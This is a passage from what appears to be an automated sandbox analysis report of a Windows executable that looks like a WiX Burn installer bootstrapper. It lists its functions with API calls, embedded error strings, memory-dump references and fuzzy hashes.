Instruction Fuzzy Hash: 7611A576A4162AB6DB306A6C9C46AABBFA4FB14B50B010517FD01E7281DA749D0892E1

Function 0059D6C9 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000008,00000000,?,005947FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,0059548E,?), ref: 0059D6DA
GetLastError.KERNEL32(?,005947FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,0059548E,?,?), ref: 0059D6E7
GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 0059D71F
GetLastError.KERNEL32(?,005947FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,0059548E,?,?), ref: 0059D72B

Strings

Failed to create UX., xrefs: 0059D76F
userexperience.cpp, xrefs: 0059D708, 0059D74C
Failed to load UX DLL., xrefs: 0059D712
BootstrapperApplicationCreate, xrefs: 0059D719
Failed to get BootstrapperApplicationCreate entry-point, xrefs: 0059D756

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
API String ID: 1866314245-2276003667
Opcode ID: 347b8caf3d0ace36ace25102c70eb8399d1f3ebdd0bb4af1917576b8540732d5
Instruction ID: 6d81255b41bd9f697480e77db584f51235496cee47ef1882e257a623e31bacb4
Opcode Fuzzy Hash: 347b8caf3d0ace36ace25102c70eb8399d1f3ebdd0bb4af1917576b8540732d5
Instruction Fuzzy Hash: 48116037A81632A7DF315B999C09B5A6EA4BB05B61F064527BE55AB280DA20DC0097E0

Function 00591175 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 53libraryloadermemoryCOMMON

Download Yara Rule

APIs

HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,0059111A,cabinet.dll,00000009,?,?,00000000), ref: 00591186
GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,0059111A,cabinet.dll,00000009,?,?,00000000), ref: 00591191
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0059119F
GetLastError.KERNEL32(?,?,?,?,?,0059111A,cabinet.dll,00000009,?,?,00000000), ref: 005911BA
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 005911C2
GetLastError.KERNEL32(?,?,?,?,?,0059111A,cabinet.dll,00000009,?,?,00000000), ref: 005911D7

Strings

SetDefaultDllDirectories, xrefs: 00591199
kernel32, xrefs: 0059118C
SetDllDirectoryW, xrefs: 005911BC

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: AddressErrorLastProc$HandleHeapInformationModule
String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
API String ID: 3104334766-1824683568
Opcode ID: 8026b6d5404ecf456a7900f594a43c3e9a51ad9579ee378b3382e5190f436146
Instruction ID: 351c058691e6b483fa23cf65beea2d30e42e78f3001c5606db5e8c04c574fa31
Opcode Fuzzy Hash: 8026b6d5404ecf456a7900f594a43c3e9a51ad9579ee378b3382e5190f436146
Instruction Fuzzy Hash: 3E019231341627FBAB206BA6AC49D6B7F5DFB54790B014013F91592200EB709A05EBA4

Function 005AF639 Relevance: 15.2, APIs: 2, Strings: 8, Instructions: 155COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 005AF64E
LeaveCriticalSection.KERNEL32(?), ref: 005AF7C9

Strings

Failed to set download user., xrefs: 005AF751
UX denied while trying to set download URL on embedded payload: %ls, xrefs: 005AF6B9
UX requested unknown payload with id: %ls, xrefs: 005AF6A3
user is active, cannot change user state., xrefs: 005AF668
Failed to set download password., xrefs: 005AF777
UX requested unknown container with id: %ls, xrefs: 005AF6F3
Failed to set download URL., xrefs: 005AF728
UX did not provide container or payload id., xrefs: 005AF7B8

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: user is active, cannot change user state.$Failed to set download URL.$Failed to set download password.$Failed to set download user.$UX denied while trying to set download URL on embedded payload: %ls$UX did not provide container or payload id.$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
API String ID: 3168844106-2615595102
Opcode ID: bda8c819d12452755adcd13d2db6e3ff5c59d4adcfed5ef2f75d9a472c6a7d9b
Instruction ID: b3d90875bb3b99af5acf775a82da1dbc29afacf4310e366648d812d0014e44dc
Opcode Fuzzy Hash: bda8c819d12452755adcd13d2db6e3ff5c59d4adcfed5ef2f75d9a472c6a7d9b
Instruction Fuzzy Hash: 5841E436900612ABDB219FB4CC49A6EBFA8FF46710F154536F804EB290EB30EC50D7A1

Function 005D5A5E Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 196filememoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(000000FF,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,00000000,00000000,00000078,00000410,000000FF,?,00000000,00000000), ref: 005D5A9B
GetLastError.KERNEL32 ref: 005D5AA9
VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004), ref: 005D5AEA
GetLastError.KERNEL32 ref: 005D5AF7
VirtualFree.KERNEL32(?,00000000,00008000), ref: 005D5C6A
CloseHandle.KERNEL32(?), ref: 005D5C79

Strings

GET, xrefs: 005D5B9E
dlutil.cpp, xrefs: 005D5ACD

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLastVirtual$AllocCloseCreateFileFreeHandle
String ID: GET$dlutil.cpp
API String ID: 2028584396-3303425918
Opcode ID: 78c429fd5760b2a4e7a5126dc81786e68c5cfdb7453a1e5a6e71943130315881
Instruction ID: 68501b6a02bc675db5e7e82c86bd2ee9b7b870c09393425ea10e37cc2b559e9a
Opcode Fuzzy Hash: 78c429fd5760b2a4e7a5126dc81786e68c5cfdb7453a1e5a6e71943130315881
Instruction Fuzzy Hash: 80617B72A00619ABEB21CFA8CC44BAE7FB9BF48750F15011BFE15A6350E7749D00DB90

Function 005A0C50 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 005A1020: CompareStringW.KERNEL32(00000000,00000000,feclient.dll,000000FF,00000000,000000FF,00000000,00000000,?,?,005A0C6F,?,00000000,?,00000000,00000000), ref: 005A104F

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,00000000,?,00000000,00000001,?,?,00000000,?,00000000), ref: 005A0DF3
GetLastError.KERNEL32 ref: 005A0E00

Strings

Failed to append package start action., xrefs: 005A0C95
plan.cpp, xrefs: 005A0E24
Failed to append payload cache action., xrefs: 005A0DAA
Failed to append rollback cache action., xrefs: 005A0CCF
Failed to append cache action., xrefs: 005A0D4A
Failed to create syncpoint event., xrefs: 005A0E2E

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CompareCreateErrorEventLastString
String ID: Failed to append cache action.$Failed to append package start action.$Failed to append payload cache action.$Failed to append rollback cache action.$Failed to create syncpoint event.$plan.cpp
API String ID: 801187047-2489563283
Opcode ID: e0f351cbfde053a8767346771c66d270d25f3eaab716a80879d865682b6863ed
Instruction ID: 5ef43c166582a7973d063847982307c85371502758f87b3e359ab2374f6d36c1
Opcode Fuzzy Hash: e0f351cbfde053a8767346771c66d270d25f3eaab716a80879d865682b6863ed
Instruction Fuzzy Hash: 7561AC76500605EFCB05CF58C884AAEBFFAFF89310F21845AE9499B241EB31EE41DB50

Function 005D6EFF Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 159COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,7622DFD0,000000FF,type,000000FF,?,7622DFD0,7622DFD0,7622DFD0), ref: 005D6F55
SysFreeString.OLEAUT32(00000000), ref: 005D6FA0
SysFreeString.OLEAUT32(00000000), ref: 005D701C
SysFreeString.OLEAUT32(00000000), ref: 005D7068

Strings

type, xrefs: 005D6F47
`Dv, xrefs: 005D6FA0, 005D701C, 005D7068
url, xrefs: 005D6F68

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: String$Free$Compare
String ID: `Dv$type$url
API String ID: 1324494773-3411263640
Opcode ID: e793a182baeed8a3c2fd1d9785f37042f2b1b396803ea0e2f03b670f6f8dc40f
Instruction ID: 2c1de2e9305cac03e2c1facdd86204c588ac3f83f50308ff642dcc6dab0dbbdc
Opcode Fuzzy Hash: e793a182baeed8a3c2fd1d9785f37042f2b1b396803ea0e2f03b670f6f8dc40f
Instruction Fuzzy Hash: F1515F35905219EFCB25DB98C848EAEBFB9BF08711F14429BE511EB2A0E7319E04DB50

Function 005A05A2 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 133registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,005DB500,00000000,?), ref: 005A06D3
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,005DB500,00000000,?), ref: 005A06E2

Part of subcall function 005D0BE9: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,005A061A,?,00000000,00020006), ref: 005D0C0E

Strings

Failed to open registration key., xrefs: 005A071A
Failed to update resume mode., xrefs: 005A06B7
%ls.RebootRequired, xrefs: 005A05F0
Failed to write volatile reboot required registry key., xrefs: 005A061E
Failed to delete registration key: %ls, xrefs: 005A0681
crypt32.dll, xrefs: 005A05AC

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Close$Create
String ID: %ls.RebootRequired$Failed to delete registration key: %ls$Failed to open registration key.$Failed to update resume mode.$Failed to write volatile reboot required registry key.$crypt32.dll
API String ID: 359002179-3398658923
Opcode ID: 40935fd124104ae9d2274cc401f7e9819478774f3b68c086401ef3a94b516847
Instruction ID: 4be28b5044a1e56d755f36d9b97917c8b365f3bed7bd225fcadf865026330100
Opcode Fuzzy Hash: 40935fd124104ae9d2274cc401f7e9819478774f3b68c086401ef3a94b516847
Instruction Fuzzy Hash: 45419031910619FBDF22AFA0CD0AEAF7FBABFC1314F14041AF541A21A1D7719A60DB51

Function 005AD24B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 118threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,005AAD40,?,00000000,00000000), ref: 005AD2E9
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005AD2F5

Part of subcall function 005ACF25: WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,005AD365,00000000,?,?,005AC7C9,00000001,?,?,?,?,?), ref: 005ACF37
Part of subcall function 005ACF25: GetLastError.KERNEL32(?,?,005AD365,00000000,?,?,005AC7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 005ACF41

CloseHandle.KERNEL32(00000000,00000000,?,?,005AC7C9,00000001,?,?,?,?,?,00000000,00000000,?,?,?), ref: 005AD376

Strings

Failed to pump messages in child process., xrefs: 005AD34D
fTY, xrefs: 005AD2A1
QEY, xrefs: 005AD283
elevation.cpp, xrefs: 005AD319
Failed to create elevated cache thread., xrefs: 005AD323

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLast$CloseCreateHandleObjectSingleThreadWait
String ID: Failed to create elevated cache thread.$Failed to pump messages in child process.$QEY$elevation.cpp$fTY
API String ID: 3606931770-2504780622
Opcode ID: 24188b27c91eb299b7159b86a45afe30067b416879e0fdc5b2bb030acb72e160
Instruction ID: 0140a4ef403f13dd64e03084584a4e10bf69fbb1fc8e77594d4bb4a145ae1490
Opcode Fuzzy Hash: 24188b27c91eb299b7159b86a45afe30067b416879e0fdc5b2bb030acb72e160
Instruction Fuzzy Hash: F541F7B6D01219AF8F14DF99D8859DEBFF8FF48750F10416AF919A7340E770A9008BA4

Function 005D159E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 117stringregistryCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,00000000,00000000,BundleUpgradeCode), ref: 005D15DA
lstrlenW.KERNEL32(?,00000002,00000001,?,00000002,00000001,00000000,00000000,BundleUpgradeCode), ref: 005D163C
lstrlenW.KERNEL32(?), ref: 005D1648
RegSetValueExW.ADVAPI32(?,?,00000000,00000007,?,?,00000001,?,?,00000002,00000001,00000000,00000000,BundleUpgradeCode), ref: 005D168B

Strings

@f_, xrefs: 005D161C, 005D1633
@f_, xrefs: 005D15B8
regutil.cpp, xrefs: 005D16B3
BundleUpgradeCode, xrefs: 005D15A7

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: lstrlen$Value
String ID: @f_$@f_$BundleUpgradeCode$regutil.cpp
API String ID: 198323757-1065161870
Opcode ID: 0b5b14cb9199ecc2bfdc1366b3a7f2163768bb9e9e9f600d1be009ad366c7134
Instruction ID: 17a8378fdacb46e1e5096adc776af4e79127efdef08803fa649cd48a1070114e
Opcode Fuzzy Hash: 0b5b14cb9199ecc2bfdc1366b3a7f2163768bb9e9e9f600d1be009ad366c7134
Instruction Fuzzy Hash: 8D418072900A2ABBDB21DF98C985AAEBFB9BB44750F050157FD11AB310C730DD11DBA4

Function 0059F451 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 109stringCOMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 0059F48A

Part of subcall function 00594115: CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,005AA0E8,00000000,00000000,?,00000000,005953BD,00000000,?,?,0059D5B5,?), ref: 00594123
Part of subcall function 00594115: GetLastError.KERNEL32(?,005AA0E8,00000000,00000000,?,00000000,005953BD,00000000,?,?,0059D5B5,?,00000000,00000000), ref: 00594131

lstrlenA.KERNEL32(005DB500,00000000,00000094,00000000,00000094,?,?,005A04BF,swidtag,00000094,?,005DB518,005A04BF,00000000,?,00000000), ref: 0059F4DD

Part of subcall function 005D4DB3: CreateFileW.KERNEL32(005DB500,40000000,00000001,00000000,00000002,00000080,00000000,005A04BF,00000000,?,0059F4F4,?,00000080,005DB500,00000000), ref: 005D4DCB
Part of subcall function 005D4DB3: GetLastError.KERNEL32(?,0059F4F4,?,00000080,005DB500,00000000,?,005A04BF,?,00000094,?,?,?,?,?,00000000), ref: 005D4DD8

Strings

Failed to create regid folder: %ls, xrefs: 0059F525
Failed to allocate regid file path., xrefs: 0059F535
Failed to allocate regid folder path., xrefs: 0059F53C
Failed to write tag xml to file: %ls, xrefs: 0059F51B
swidtag, xrefs: 0059F49D
Failed to format tag folder path., xrefs: 0059F543

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CreateErrorLast$DirectoryFileOpen@16lstrlen
String ID: Failed to allocate regid file path.$Failed to allocate regid folder path.$Failed to create regid folder: %ls$Failed to format tag folder path.$Failed to write tag xml to file: %ls$swidtag
API String ID: 904508749-1201533908
Opcode ID: 481560e0163918286ca3efcc7d3e1e8123b6d4ef8443d4ffc4b0a77a43413fd0
Instruction ID: ab308b85f3b3ed4b8fd8735ec4b1c1e032c36c8c5eeb5835ce5b6fa0bbe11562
Opcode Fuzzy Hash: 481560e0163918286ca3efcc7d3e1e8123b6d4ef8443d4ffc4b0a77a43413fd0
Instruction Fuzzy Hash: 64317A31D0062AFBDF21AE98CC45B9DBFB4BF04710F158166E910EA251E7719E50EB90

Function 005A53E2 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 91synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0002BF20,?,F0000003,00000000,00000000,?,00000000,00000000,00000000,0059548E,00000000,00000000,?,00000000), ref: 005A548B
GetLastError.KERNEL32(?,?,?,00594C61,?,?,00000000,?,?,?,?,?,?,005DB4A0,?,?), ref: 005A5496

Strings

Failed to wait for child process exit., xrefs: 005A54C4
Failed to write restart to message buffer., xrefs: 005A542E
Failed to write exit code to message buffer., xrefs: 005A5406
Failed to post terminate message to child process cache thread., xrefs: 005A545A
pipe.cpp, xrefs: 005A54BA
Failed to post terminate message to child process., xrefs: 005A5476

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLastObjectSingleWait
String ID: Failed to post terminate message to child process cache thread.$Failed to post terminate message to child process.$Failed to wait for child process exit.$Failed to write exit code to message buffer.$Failed to write restart to message buffer.$pipe.cpp
API String ID: 1211598281-2161881128
Opcode ID: acda89306a0ac4fe43c3005e81e68e8c278d1e411e1dc6034cb2a9711e9e0d9e
Instruction ID: fc5bee77379f293a218d343a87d4fd02b79d19dacc3e617a117eee99e3afb143
Opcode Fuzzy Hash: acda89306a0ac4fe43c3005e81e68e8c278d1e411e1dc6034cb2a9711e9e0d9e
Instruction Fuzzy Hash: 97210A37941B26BBDF225A94DC09E9E7F69BF09731F114216F900B6190F730AE509BE0

Function 005A9098 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 89fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000101,?,005A9F04,00000003,000007D0,00000003,?,000007D0), ref: 005A90B2
GetLastError.KERNEL32(?,005A9F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001,?), ref: 005A90BF
CloseHandle.KERNEL32(00000000,?,005A9F04,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,00000001), ref: 005A9187

Strings

Failed to verify hash of payload: %ls, xrefs: 005A9172
cache.cpp, xrefs: 005A90F6
Failed to verify signature of payload: %ls, xrefs: 005A912F
Failed to open payload at path: %ls, xrefs: 005A9103
Failed to verify catalog signature of payload: %ls, xrefs: 005A914E

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: Failed to open payload at path: %ls$Failed to verify catalog signature of payload: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$cache.cpp
API String ID: 2528220319-2757871984
Opcode ID: 49f46b3e2a7948846e50d2b65d111145a68a170a7ed2cd2903211f242c4a2b16
Instruction ID: a663547aa8d80dcc0b43a23ea2b8a97568483810ec84ae2451e0ca66ab4b96a7
Opcode Fuzzy Hash: 49f46b3e2a7948846e50d2b65d111145a68a170a7ed2cd2903211f242c4a2b16
Instruction Fuzzy Hash: BA21E23654163BB7CB321A688C4DF9E7F59BF467A0F118212FD14661A093319C61EBD1

Function 00596B1E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 88COMMON

Download Yara Rule

APIs

GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00596B69
GetLastError.KERNEL32 ref: 00596B73
GetVolumePathNameW.KERNEL32(?,?,00000104), ref: 00596BB7
GetLastError.KERNEL32 ref: 00596BC1

Strings

Failed to get windows directory., xrefs: 00596BA1
variable.cpp, xrefs: 00596B97, 00596BE5
Failed to set variant value., xrefs: 00596C0B
Failed to get volume path name., xrefs: 00596BEF

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLast$DirectoryNamePathVolumeWindows
String ID: Failed to get volume path name.$Failed to get windows directory.$Failed to set variant value.$variable.cpp
API String ID: 124030351-4026719079
Opcode ID: 29f5a63140ccd2e990f653fefc98c28fc6cdb2c90d769f2594954e6e69f6f675
Instruction ID: e1c18bbe00100c55e754d19e679d7a988660f7736c109eb39609db64e48a711d
Opcode Fuzzy Hash: 29f5a63140ccd2e990f653fefc98c28fc6cdb2c90d769f2594954e6e69f6f675
Instruction Fuzzy Hash: 4B21BA77E4223967DB3096549D0AF9A7F6CBB40B10F110167BD04F7281EA34AE4496E5

Function 00599C6D Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 00599C88
GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,000002C0,?,0059A895,00000100,000002C0,000002C0,?,000002C0), ref: 00599CA0
GetLastError.KERNEL32(?,0059A895,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 00599CAB

Strings

Failed to set variable., xrefs: 00599D2B
Failed get to file attributes. '%ls', xrefs: 00599CE8
File search: %ls, did not find path: %ls, xrefs: 00599CFD
Failed to format variable string., xrefs: 00599C93
search.cpp, xrefs: 00599CDB

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Failed get to file attributes. '%ls'$Failed to format variable string.$Failed to set variable.$File search: %ls, did not find path: %ls$search.cpp
API String ID: 1811509786-2053429945
Opcode ID: 7947d71f0c0ac080543b7430327ead0b99ab1f67967c8306118a1aff215e9ef3
Instruction ID: b488602786ca1da0ae07e34439f3a05f1c79876d90bec84370e8717f3c751209
Opcode Fuzzy Hash: 7947d71f0c0ac080543b7430327ead0b99ab1f67967c8306118a1aff215e9ef3
Instruction Fuzzy Hash: 8121F633941225BAEF312A9C8D8BFAEBF68FF15761F11021BFD147A290D7216D10A6D1

Function 005AAD40 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,?), ref: 005AAD57
GetLastError.KERNEL32 ref: 005AAD61
CoInitializeEx.OLE32(00000000,00000000), ref: 005AADA0
